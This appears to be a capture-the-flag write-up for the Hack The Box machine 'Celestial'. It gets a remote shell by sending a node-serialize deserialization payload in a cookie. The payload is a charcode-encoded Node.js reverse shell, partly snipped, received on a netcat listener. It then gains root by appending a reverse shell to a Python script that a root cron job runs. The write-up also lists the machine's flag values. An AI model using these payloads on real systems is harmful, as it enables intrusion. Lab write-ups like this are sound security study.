# Celestial

## Celestial - 10.10.10.85

### Target Enumeration:

OS: Linux

IP: 10.10.10.85

User: 9a093cd22ce86b7f41db4116e80d0b0f

Root: ba1d0019200a54e370ca151007a8095a

### Ports / Services / Software Versions Running

3000/tcp open  http Node.js Express framework

### Vulnerability Exploited:

Node.js deserialization bug (node-serialize `unserialize()` on an attacker-controlled cookie)

<https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/>

### Privilege Escalation:

A Python script in the user's Documents folder that root's cron job runs every 5 minutes

### Exploiting the host:

Nmap:

![](https://lh3.googleusercontent.com/k_bH_cDLr4J5bbAHMPEBUup3kFRvkdoNSIJgCrQRN0KHegYfJti93NZSxhE3Bo4X14E3owBErWI9e4HdOOsQmzxfRq0AuMz04zaXiwocS66i7hrvn11Maxsa2SKK5ZrXHaBtbrDz)

Visiting in browser:

![](https://lh6.googleusercontent.com/9K17hV94KjxFdVuAT7fJjuNkT5EtG49bRa4vga14GNipr8Ms0pOA7VhOVlAxr83TkTv4Y8SPawPml-gYU_O7UAv4bBn1iOHQHgk5cKxiMnbMEsZeuuyZUdo6qNdm-8q1mMRrmAOr)

Decoding the cookie gives you:

![](https://lh3.googleusercontent.com/kbOne22ITm-sHi6RtMytTrSJdujIcpNMZNgk-nt0jONK9f_jMWfrPfIaNNeRLQGk5-oLL-x8P__UlYx4ZpaGUVmGR_7Y8YYfiH4z9VRsZUm41BdBep0Sg17WBY_b74_f_ZhVTd0G)

Searching for known Node.js vulnerabilities turned up:

<https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/>

Download nodejsshell.py and run it:

![](https://lh6.googleusercontent.com/ApCOVk_dIga03oAxdGXCZkBJt2Ou6rkLWU-TmjZREYxxOzqht7oCVWduzrE9WTS0v6Pt8X_9gYwo_d3E5q8yj7oOq0ftMrVVBl58mJ3ZHAcfhDyyxD0eDbgQ3NgvVVT_RiuyAdF1)

Copy the output to a file and modify it to reproduce the whole string below, as described in the linked guide:

```
{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,--SNIP-6,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}
```

Encode this in base64 and replace the cookie value with it.

Set up a nc listener on port 443 and send the request:

![](https://lh5.googleusercontent.com/hNMxvXunsmYsCuXGumQJLDX1WRb4M5PRV0APMHgtxwH4_onM5Mf4k-0FXqN7UHBQZGlm66MFWC9Q9uZoUkgNskM1TzL_8aLrIXxv-w6-MKzK5yZa6FgLrmQQ2W_I5VX79BpMJ1Yb)

Your listener will now spawn a shell.

![](https://lh4.googleusercontent.com/Ec0ngu7TGnfD-WGEiv2EboPQl0InIIzZV--MlNijKuUVVT_qu9d1HkZBAOWi8nOuFpzuJOY3tBFUM4vVF7kXJ_4SizJDwi0LNyNnxR2MOgR-KBo9MVccDGIdmWgUTkqs1QQ6V6yL)

Located in the Documents folder is script.py.

It appears to run every 5 minutes and is overwritten each time, so you cannot simply replace it with a Python reverse shell without breaking it. Also found is output.txt.

![](https://lh5.googleusercontent.com/D0pEuaPeSmUuXEDGDgwbr0vXzOjRDW7jG9xmsDOlhvO76npajXPv4vFM689Ted6FbULgEm6HdzigKcodu0vkviv-RkpB25QQMKwf-RBTEU-SJKGwrfqM5s9x4Pe2AfgvL5SrmqkW)

This holds the output of script.py. Although we have not yet found a crontab for root, output.txt is rewritten every 5 minutes as root, so we can assume that whatever is in script.py is executed as the root user on that schedule.

So append to the end of the file:

![](https://lh4.googleusercontent.com/cwtlMdjFs8BXATYhNtMAfIPIcjMpXJqvIm1G58nCIQPGIqZaOUKQQAiml6pDdlf9LY-peEWLxIBt3Djb2JEWjdgnl5XONa_7667Rq6uOj7IWSCmoESZwfG6DZ39Ld5VsYkchZv-I)

Set up a listener on port 444 and wait around 5 minutes for the root shell.

![](https://lh3.googleusercontent.com/4iH8uwVSYiXZOwJkBMqPS5mctMUiZowxE7qMnDUy2j-rWnx-bagb7UEdlTrqKrcxPFabBH5Qb-8wge1bypHWDDjsehRZhOKtD-dGqMd1RM86m_cxfUvG_5-50fjW53-7n0n-QvWK)

Checking root's crontab confirms that it overwrites the file every 5 minutes:

![](https://lh5.googleusercontent.com/gbcQY_8m8s-kipLcDgYdQacmxBbWkDOJZWyXSllxJ-r_GUm8jE7dTS2MdN75pJgdUS4mx2X-6HPU9UzlRoSxX4TFgBepLqoJhG2rWgwluVdBe38nQwuLuyX8VkkWQ_SoJOzCHfRX)
